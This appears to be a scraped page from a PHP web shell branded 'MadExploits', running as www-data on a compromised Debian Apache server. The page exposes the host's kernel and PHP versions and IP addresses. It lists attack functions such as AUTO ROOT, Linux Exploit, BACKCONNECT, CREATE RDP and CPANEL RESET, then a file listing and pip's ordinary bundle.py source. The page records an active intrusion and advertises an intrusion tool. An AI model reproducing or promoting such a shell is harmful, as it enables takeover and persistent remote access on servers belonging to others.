Linux biogene 3.16.0-11-amd64 #1 SMP Debian 3.16.84-1 (2020-06-09) x86_64
Apache
: 46.101.124.208 | : 18.188.212.154
Cant Read [ /etc/named.conf ]
5.6.40-0+deb8u12
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python2.7 /
dist-packages /
pip /
commands /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.py
2.18
KB
-rw-r--r--
__init__.pyc
2.55
KB
-rw-r--r--
bundle.py
1.75
KB
-rw-r--r--
bundle.pyc
2.17
KB
-rw-r--r--
completion.py
1.79
KB
-rw-r--r--
completion.pyc
2.33
KB
-rw-r--r--
freeze.py
4.54
KB
-rw-r--r--
freeze.pyc
4.37
KB
-rw-r--r--
help.py
927
B
-rw-r--r--
help.pyc
1.26
KB
-rw-r--r--
install.py
13.08
KB
-rw-r--r--
install.pyc
9.8
KB
-rw-r--r--
list.py
6.65
KB
-rw-r--r--
list.pyc
6.27
KB
-rw-r--r--
search.py
4.61
KB
-rw-r--r--
search.pyc
5.17
KB
-rw-r--r--
show.py
2.69
KB
-rw-r--r--
show.pyc
3.24
KB
-rw-r--r--
uninstall.py
2.15
KB
-rw-r--r--
uninstall.pyc
2.59
KB
-rw-r--r--
unzip.py
185
B
-rw-r--r--
unzip.pyc
551
B
-rw-r--r--
wheel.py
7.71
KB
-rw-r--r--
wheel.pyc
6.17
KB
-rw-r--r--
zip.py
14.47
KB
-rw-r--r--
zip.pyc
11.47
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bundle.py
import textwrap from pip.locations import build_prefix, src_prefix from pip.util import display_path, backup_dir from pip.log import logger from pip.exceptions import InstallationError from pip.commands.install import InstallCommand class BundleCommand(InstallCommand): """Create pybundles (archives containing multiple packages).""" name = 'bundle' usage = """ %prog [options] <bundle name>.pybundle <package>...""" summary = 'DEPRECATED. Create pybundles.' bundle = True def __init__(self, *args, **kw): super(BundleCommand, self).__init__(*args, **kw) # bundle uses different default source and build dirs build_opt = self.parser.get_option("--build") build_opt.default = backup_dir(build_prefix, '-bundle') src_opt = self.parser.get_option("--src") src_opt.default = backup_dir(src_prefix, '-bundle') self.parser.set_defaults(**{ src_opt.dest: src_opt.default, build_opt.dest: build_opt.default, }) def run(self, options, args): logger.deprecated('1.6', "DEPRECATION: 'pip bundle' and support for installing from *.pybundle files is deprecated. " "See https://github.com/pypa/pip/pull/1046") if not args: raise InstallationError('You must give a bundle filename') # We have to get everything when creating a bundle: options.ignore_installed = True logger.notify('Putting temporary build files in %s and source/develop files in %s' % (display_path(options.build_dir), display_path(options.src_dir))) self.bundle_filename = args.pop(0) requirement_set = super(BundleCommand, self).run(options, args) return requirement_set
Close